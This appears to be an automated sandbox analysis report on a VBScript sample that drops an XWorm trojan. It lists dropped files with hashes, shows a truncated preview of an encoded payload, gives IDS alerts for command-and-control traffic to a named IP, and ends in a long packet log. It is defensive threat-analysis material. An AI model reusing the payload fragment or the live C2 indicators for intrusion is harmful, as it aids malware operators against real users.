                                                                        Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):64
                                                                        Entropy (8bit):1.1940658735648508
                                                                        Encrypted:false
                                                                        SSDEEP:3:Nlllultnxj:NllU
                                                                        MD5:F93358E626551B46E6ED5A0A9D29BD51
                                                                        SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                                                        SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                                                        SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                                                        Malicious:false
                                                                        Reputation:moderate, very likely benign file
                                                                        Preview:@...e................................................@..........

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g5jqalbu.ymw.ps1

                                                                        Download File
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Reputation:high, very likely benign file
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ir33ht2e.has.psm1

                                                                        Download File
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_izhnjtxg.3t0.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rdelniyb.f0a.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Roaming\Briarberry.Mil

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):448940
                                                                        Entropy (8bit):5.93828516382934
                                                                        Encrypted:false
                                                                        SSDEEP:12288:3Kl7pme+1y7jQjfswBeaFvFQ9R5dDVtyDoTl9O:34+ujkfxBO5dJtLs
                                                                        MD5:81DB82EDAE38BF944999451235D9E9C0
                                                                        SHA1:2250F98C9BFC16D3A5CA9560CB3447AABE04A570
                                                                        SHA-256:E593978C513F1C50D0A811AD19022BE63B110D3293C25F4693C820305D3CDEA9
                                                                        SHA-512:C51EB0F644194599484E63F5DEDCC180BEE5CE64A79D7137E8E3413BEA1BB30763438CEB8A8C663F7CD4908F1BFE6642036C6446876F3E078FF9CAAA15645BCE
                                                                        Malicious:false
                                                                        Preview:cQGb6wLzsruMSxIA6wLLbOsC/owDXCQE6wL603EBm7lc+QHvcQGbcQGbgfE7PPNTcQGbcQGbgelnxfK86wKxJHEBm3EBm+sC1zK6F2XrJesCHvpxAZtxAZvrAqivMcrrAsnV6wLbY4kUC3EBm+sCZ2XR4nEBm+sCth6DwQTrAg7y6wIX7oH5NAciAnzJ6wLBhXEBm4tEJARxAZvrAlsTicPrAvhz6wLoDoHDPdSfAHEBm3EBm7qKeAIs6wJ1TXEBm4HyRthSfnEBm+sCsymBwjRfr61xAZvrAuh7cQGbcQGbcQGbcQGbiwwQ6wKj9HEBm4kME3EBm+sCIDBCcQGbcQGbgfpktAQAdddxAZtxAZuJXCQMcQGbcQGbge0AAwAAcQGbcQGbi1QkCOsCuipxAZuLfCQE6wIlyOsCjHWJ6+sCxXpxAZuBw5wAAADrAhsPcQGbU3EBm3EBm2pAcQGbcQGbievrAo/qcQGbx4MAAQAAAGA3AusCJ89xAZuBwwABAABxAZvrAgokU3EBm3EBm4nrcQGbcQGbibsEAQAAcQGbcQGbgcMEAQAAcQGbcQGbU3EBm+sCFYlq/+sCKpLrAgwLg8IF6wKFq+sCHvsx9usCzChxAZsxyXEBm3EBm4sa6wLOwusCjF5BcQGb6wL61jkcCnXzcQGbcQGbRusCwQpxAZuAfAr7uHXecQGbcQGbi0QK/OsCsaTrAqmsKfBxAZvrAj34/9LrAp/I6wLkWLpktAQAcQGb6wIUJjHAcQGb6wLmBIt8JAxxAZtxAZuBNAc5Nsz86wKJPOsCgMSDwARxAZtxAZs50HXk6wLciHEBm4n76wJac3EBm//XcQGb6wIQhrDTRYGTiWbXDEdNO0hUBCC4wSzPkAhNOzxzZ3AQykeBk2NFGYCGbDcYtjN5uN9bnUzCTQ04MOSKuN/MxUdtqnnzC0tO0hELuDQ23UwrvE2QNDaaC6CZTZA0NoC9N49NkDQ2o4tTFwt52TfM

                                                                        Static File Info

                                                                        General

                                                                        File type:ASCII text, with CRLF line terminators
                                                                        Entropy (8bit):5.070380022746645
                                                                        TrID:
                                                                        • Visual Basic Script (13500/0) 100.00%
                                                                        File name:windows.vbs
                                                                        File size:74'750 bytes
                                                                        MD5:828b53e8f1faed52722f7b7dd53c8c92
                                                                        SHA1:f80c8f0bcb94ea38d10e239b203e4e990b649540
                                                                        SHA256:d0f73c23361be86872a1a87ef43e998a0e1e4fabbd40f5cd86ae333e1a09bdb7
                                                                        SHA512:9273d55d7e193a3853b15dbc7d35cf545e00fb82428d22f554124cd74d694629fe775e626adcdc577d6961c8a86f9d2a57ea822f933533eff82a9a38c2420d87
                                                                        SSDEEP:1536:xvv1gPn2+VbGSZ0way5Nv6/+sfoYNkvYX4+1pFlEixGvQ:x2PRVbnZB5M2s1+r+1rFGvQ
                                                                        TLSH:9B735BD1EB69094A8C4B2799FF51CD41CABC8A05052332A1BEC9077E610B86C93FD6DF
                                                                        File Content Preview:..'Straitsmen hovedlinjernes sulfhydrate..'Couscouses bayonneskinker tommeskruen; heresimach bgetrernes,..Const Premeditations = 64 ..'Mellemdistanceraket144. mummers stammefejdernes meiotically morth..'Ambulators grise acrolithic..'Undulately! funnyman s

                                                                        File Icon

                                                                        Icon Hash:68d69b8f86ab9a86

                                                                        Network Behavior

                                                                        Snort IDS Alerts

                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                        05/23/24-18:27:12.688536TCP2852870ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes88954971357.128.155.22192.168.2.9
                                                                        05/23/24-18:27:12.688536TCP2852874ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M288954971357.128.155.22192.168.2.9
                                                                        05/23/24-18:26:11.361514TCP2855924ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound497138895192.168.2.957.128.155.22

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        May 23, 2024 18:25:10.072065115 CEST49706443192.168.2.9172.67.170.105
                                                                        May 23, 2024 18:25:10.072105885 CEST44349706172.67.170.105192.168.2.9
                                                                        May 23, 2024 18:25:10.072226048 CEST49706443192.168.2.9172.67.170.105
                                                                        May 23, 2024 18:25:10.081484079 CEST49706443192.168.2.9172.67.170.105
                                                                        May 23, 2024 18:25:10.081500053 CEST44349706172.67.170.105192.168.2.9
                                                                        May 23, 2024 18:25:10.578629971 CEST44349706172.67.170.105192.168.2.9
                                                                        May 23, 2024 18:25:10.578707933 CEST49706443192.168.2.9172.67.170.105
                                                                        May 23, 2024 18:25:10.583688021 CEST49706443192.168.2.9172.67.170.105
                                                                        May 23, 2024 18:25:10.583700895 CEST44349706172.67.170.105192.168.2.9
                                                                        May 23, 2024 18:25:10.583971977 CEST44349706172.67.170.105192.168.2.9
                                                                        May 23, 2024 18:25:10.596093893 CEST49706443192.168.2.9172.67.170.105
                                                                        May 23, 2024 18:25:10.642491102 CEST44349706172.67.170.105192.168.2.9
                                                                        May 23, 2024 18:25:10.853566885 CEST44349706172.67.170.105192.168.2.9
                                                                        May 23, 2024 18:25:10.853646994 CEST44349706172.67.170.105192.168.2.9
                                                                        May 23, 2024 18:25:10.853719950 CEST49706443192.168.2.9172.67.170.105
                                                                        May 23, 2024 18:25:10.856257915 CEST49706443192.168.2.9172.67.170.105
                                                                        May 23, 2024 18:25:10.924297094 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:10.924340963 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:10.924453974 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:10.924952030 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:10.924971104 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:11.607549906 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:11.607647896 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:11.613985062 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:11.614000082 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:11.614284992 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:11.653477907 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:11.698512077 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:11.918881893 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:11.918911934 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:11.918919086 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:11.918942928 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:11.918951035 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:11.919061899 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:11.919090986 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:11.919130087 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:11.919167995 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:11.938781023 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:11.938841105 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:11.939016104 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:11.939030886 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:11.939095974 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.006197929 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.006233931 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.006330013 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.006360054 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.006409883 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.019207001 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.019234896 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.019366026 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.019385099 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.019431114 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.030893087 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.030910969 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.031039953 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.031050920 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.031096935 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.040576935 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.040595055 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.040740967 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.040751934 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.040803909 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.096935987 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.097007990 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.097135067 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.097146034 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.097176075 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.097199917 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.106322050 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.106390953 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.106529951 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.106539011 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.106592894 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.113320112 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.113337040 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.113626957 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.113636017 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.113686085 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.119827986 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.119848013 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.119995117 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.120007038 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.120104074 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.125457048 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.125473976 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.125597000 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.125605106 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.125691891 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.130768061 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.130790949 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.130912066 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.130919933 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.131026983 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.184000015 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.184025049 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.184310913 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.184320927 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.184427023 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.190567017 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.190584898 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.190737963 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.190746069 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.190855980 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.194617033 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.194633961 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.194744110 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.194752932 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.194829941 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.197619915 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.197647095 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.197796106 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.197803020 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.197900057 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.203089952 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.203120947 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.203314066 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.203320980 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.203433990 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.207360029 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.207386971 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.207557917 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.207565069 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.207618952 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.214823961 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.214848995 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.214977026 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.214984894 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.215033054 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.219151974 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.219177961 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.219280005 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.219286919 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.219333887 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.275407076 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.275443077 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.275491953 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.275525093 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.275552034 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.275576115 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.279584885 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.279604912 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.279664040 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.279674053 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.279714108 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.282710075 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.282730103 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.282803059 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.282812119 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.282850981 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.285062075 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.285084009 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.285155058 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.285162926 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.285208941 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.289051056 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.289072990 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.289141893 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.289151907 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.289189100 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.296766996 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.296786070 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.296849012 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.296860933 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.296897888 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.300733089 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.300760031 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.300829887 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.300837994 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.300879955 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.301564932 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.301636934 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.301642895 CEST4434970769.31.136.17192.168.2.9
                                                                        May 23, 2024 18:25:12.301688910 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:12.302067995 CEST49707443192.168.2.969.31.136.17
                                                                        May 23, 2024 18:25:53.853878021 CEST49710443192.168.2.9172.67.170.105
                                                                        May 23, 2024 18:25:53.853907108 CEST44349710172.67.170.105192.168.2.9
                                                                        May 23, 2024 18:25:53.854199886 CEST49710443192.168.2.9172.67.170.105
                                                                        May 23, 2024 18:25:53.880204916 CEST49710443192.168.2.9172.67.170.105
                                                                        May 23, 2024 18:25:53.880228043 CEST44349710172.67.170.105192.168.2.9
                                                                        May 23, 2024 18:25:54.492351055 CEST44349710172.67.170.105192.168.2.9
                                                                        May 23, 2024 18:25:54.492491961 CEST49710443192.168.2.9172.67.170.105
                                                                        May 23, 2024 18:25:54.571527958 CEST49710443192.168.2.9172.67.170.105
                                                                        May 23, 2024 18:25:54.571547985 CEST44349710172.67.170.105192.168.2.9
                                                                        May 23, 2024 18:25:54.572509050 CEST44349710172.67.170.105192.168.2.9
                                                                        May 23, 2024 18:25:54.572634935 CEST49710443192.168.2.9172.67.170.105
                                                                        May 23, 2024 18:25:54.576278925 CEST49710443192.168.2.9172.67.170.105
                                                                        May 23, 2024 18:25:54.622522116 CEST44349710172.67.170.105192.168.2.9
                                                                        May 23, 2024 18:25:54.854821920 CEST44349710172.67.170.105192.168.2.9
                                                                        May 23, 2024 18:25:54.854901075 CEST44349710172.67.170.105192.168.2.9
                                                                        May 23, 2024 18:25:54.855006933 CEST49710443192.168.2.9172.67.170.105
                                                                        May 23, 2024 18:25:54.855006933 CEST49710443192.168.2.9172.67.170.105
                                                                        May 23, 2024 18:25:54.859993935 CEST49710443192.168.2.9172.67.170.105
                                                                        May 23, 2024 18:25:54.860014915 CEST44349710172.67.170.105192.168.2.9
                                                                        May 23, 2024 18:25:54.913959026 CEST49711443192.168.2.969.31.136.57
                                                                        May 23, 2024 18:25:54.914026022 CEST4434971169.31.136.57192.168.2.9
                                                                        May 23, 2024 18:25:54.914099932 CEST49711443192.168.2.969.31.136.57
                                                                        May 23, 2024 18:25:54.914710045 CEST49711443192.168.2.969.31.136.57
                                                                        May 23, 2024 18:25:54.914733887 CEST4434971169.31.136.57192.168.2.9
                                                                        May 23, 2024 18:25:55.833471060 CEST4434971169.31.136.57192.168.2.9
                                                                        May 23, 2024 18:25:55.833646059 CEST49711443192.168.2.969.31.136.57
                                                                        May 23, 2024 18:25:55.841075897 CEST49711443192.168.2.969.31.136.57
                                                                        May 23, 2024 18:25:55.841093063 CEST4434971169.31.136.57192.168.2.9
                                                                        May 23, 2024 18:25:55.841329098 CEST4434971169.31.136.57192.168.2.9
                                                                        May 23, 2024 18:25:55.841408968 CEST49711443192.168.2.969.31.136.57
                                                                        May 23, 2024 18:25:55.842037916 CEST49711443192.168.2.969.31.136.57
                                                                        May 23, 2024 18:25:55.886493921 CEST4434971169.31.136.57192.168.2.9
                                                                        May 23, 2024 18:25:56.149379015 CEST4434971169.31.136.57192.168.2.9
                                                                        May 23, 2024 18:25:56.149415016 CEST4434971169.31.136.57192.168.2.9
                                                                        May 23, 2024 18:25:56.149451971 CEST4434971169.31.136.57192.168.2.9
                                                                        May 23, 2024 18:25:56.149482012 CEST49711443192.168.2.969.31.136.57
                                                                        May 23, 2024 18:25:56.149482012 CEST49711443192.168.2.969.31.136.57
                                                                        May 23, 2024 18:25:56.149492025 CEST4434971169.31.136.57192.168.2.9
                                                                        May 23, 2024 18:25:56.149517059 CEST49711443192.168.2.969.31.136.57
                                                                        May 23, 2024 18:25:56.150367022 CEST49711443192.168.2.969.31.136.57
                                                                        May 23, 2024 18:25:56.157744884 CEST4434971169.31.136.57192.168.2.9
                                                                        May 23, 2024 18:25:56.157782078 CEST4434971169.31.136.57192.168.2.9
                                                                        May 23, 2024 18:25:56.157866955 CEST49711443192.168.2.969.31.136.57
                                                                        May 23, 2024 18:25:56.157866955 CEST49711443192.168.2.969.31.136.57
                                                                        May 23, 2024 18:25:56.157875061 CEST4434971169.31.136.57192.168.2.9
                                                                        May 23, 2024 18:25:56.157910109 CEST49711443192.168.2.969.31.136.57
